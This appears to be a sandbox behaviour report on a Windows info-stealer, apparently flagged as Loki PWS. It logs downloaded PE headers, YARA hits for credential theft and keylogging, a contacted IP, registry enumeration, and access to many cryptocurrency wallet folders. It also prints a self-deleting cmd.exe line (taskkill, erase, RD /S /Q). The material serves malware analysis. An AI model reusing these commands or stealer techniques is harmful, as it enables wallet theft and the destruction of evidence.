 buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $Àð/„‘AV„‘AV„‘AVéÒVˆ‘AV]ó@W†‘AV1†V…‘AV]óBW€‘AV]óDW‘AV]óEW‘AV¦ñ@W€‘AVOò@W‡‘AV„‘@V֑AVOòBW†‘AVOòEWÀ‘AVOòAW…‘AVOò¾V…‘AVOòCW…‘AVRich„‘AVPELØbë[à"!  Øf)Ýðp£s@pæPÀæÈ@xüÐPà0âTˆâ@ð8.texttÖØ `.rdataüþðÜ@@.data,HðÜ@À.rsrcx@à@@.relocàPä@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÂU±É£;âÉ£;âÉ£;âÀÛ¨âÙ£;âWüâË£;âÁ8ãÇ£;âÁ?ã£;âÁ:ãÍ£;âÁ>ãÛ£;âëÃ:ãÀ£;âÉ£:âw£;âÀ?ãÈ£;âÀ>ãÝ£;âÀ;ãÈ£;âÀÄâÈ£;âÀ9ãÈ£;âRichÉ£;âPELÄ_ë[à"!  z†à‚@3@A@Àt´Þ, xúÐ0h ¹TT¹h¸@ôl¾€.textÊxz `.rdata^ef~@@.data¼ ä@À.didat8æ@À.rsrcx è@@.reloch 0ì@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $¦È¼Aâ©Òâ©Òâ©ÒV5=à©ÒëÑAú©Ò;ËÓá©Òâ©Ó"©Ò;ËÑë©Ò;ËÖî©Ò;Ë×ô©Ò;ËÚ•©Ò;ËÒã©Ò;Ë-ã©Ò;ËÐã©ÒRichâ©ÒPEL8'Yà"!  ‚P±  Ðaz@AðC‚ÏôR,€øx8?4:ðf8È(@Pð˜@@.textr `.data( @À.idata6P @@.didat4p6@À.rsrcø€8@@.reloc4:<<@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $#ƒ4ŒgâZßgâZßgâZßnšÉßsâZß¾€[ÞeâZßùBßcâZß¾€YÞjâZß¾€_ÞmâZß¾€^ÞlâZßE‚[ÞoâZ߬[ÞdâZßgâ[ߐâZ߬^ÞmãZ߬ZÞfâZ߬¥ßfâZ߬XÞfâZßRichgâZßPEL­bë[à"!  êwð@·»@ˆ ˆ=T°pæÐÀ}p—Tȗ@ø.textèê `.rdataRTî@@.datatG`"B@À.rsrcp°d@@.reloc}À~h@B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@𺴠Í!¸LÍ!This program cannot be run in DOS mode. $ù£NE˜ÍE˜ÍE˜Íñ"G˜ÍLà^N˜ÍE˜Ìl˜ÍœúÉU˜ÍœúÎV˜ÍœúÈA˜ÍœúÅ_˜ÍœúÍD˜Íœú2D˜ÍœúÏD˜ÍRichE˜ÍPEL 8'Yà"!  ê ® @¼@A°ð ÀŒ H?0” °8è@¼.textÄéê `.dataDî@À.idata¸ð@@.rsrc ö@@.reloc” 0 ü@B
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x000ef000', u'virtual_address': u'0x00001000', u'entropy': 7.702529877028258, u'name': u'.text', u'virtual_size': u'0x000ee680'} entropy 7.70252987703 description A section with a high entropy has been found
entropy 0.991701244813 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://ip-api.com/json
url https://dotbit.me/a/
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description Steal credential rule local_credential_Steal
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Communications use DNS rule Network_DNS
description Communications over RAW Socket rule Network_TCP_Socket
description Win32 PWS Loki rule Win32_PWS_Loki_Zero
description Run a KeyLogger rule KeyLogger
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description Take ScreenShot rule ScreenShot
description Match Windows Http API call rule Str_Win32_Http_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall
base_handle: 0x80000002
key_handle: 0x00000344
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\AddressBook
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\Connection Manager
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\DirectDrawEx
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\EditPlus
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\ENTERPRISE
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\Fontcore
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\Google Chrome
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\Haansoft HWord 80 Korean
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\IE40
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\IE4Data
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\IE5BAKEX
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\IEData
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\MobileOptionPack
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\SchedulingAgent
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\WIC
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExA

 regkey_r: SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x80000002
key_handle: 0x00000348
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0
cmdline taskkill /pid 2364
cmdline cmd.exe /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Local\Temp\vcxfse.exe & RD /S /Q C:\\ProgramData\\404534644891112\\* & exit
cmdline "C:\Windows\System32\cmd.exe" /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Local\Temp\vcxfse.exe & RD /S /Q C:\\ProgramData\\404534644891112\\* & exit
buffer Buffer with sha1: b0035797165aa933fd25e266be4ee0c829588698
buffer Buffer with sha1: 8adf54ae06306ee106fb75b776d7a4753497df47
buffer Buffer with sha1: d86f2424588d13f99ac6c74f4b608c0a318e07a9
host 94.158.245.173
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
file C:\Users\test22\AppData\Roaming\Bitcoin\
file C:\Users\test22\AppData\Roaming\Electrum\wallets\
file C:\Users\test22\AppData\Roaming\Litecoin\
file C:\Users\test22\AppData\Roaming\Namecoin\
file C:\Users\test22\AppData\Roaming\Terracoin\
file C:\Users\test22\AppData\Roaming\Primecoin\
file C:\Users\test22\AppData\Roaming\Freicoin\
file C:\Users\test22\AppData\Roaming\devcoin\
file C:\Users\test22\AppData\Roaming\Franko\
file C:\Users\test22\AppData\Roaming\Megacoin\
file C:\Users\test22\AppData\Roaming\Infinitecoin\
file C:\Users\test22\AppData\Roaming\Ixcoin\
file C:\Users\test22\AppData\Roaming\Anoncoin\
file C:\Users\test22\AppData\Roaming\BBQCoin\
file C:\Users\test22\AppData\Roaming\digitalcoin\
file C:\Users\test22\AppData\Roaming\Mincoin\
file C:\Users\test22\AppData\Roaming\GoldCoin (GLD)\
file C:\Users\test22\AppData\Roaming\YACoin\
file C:\Users\test22\AppData\Roaming\Florincoin\
Time & API Arguments Status Return Repeated

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: ????? ?? 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExA

 key_handle: 0x00000348
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
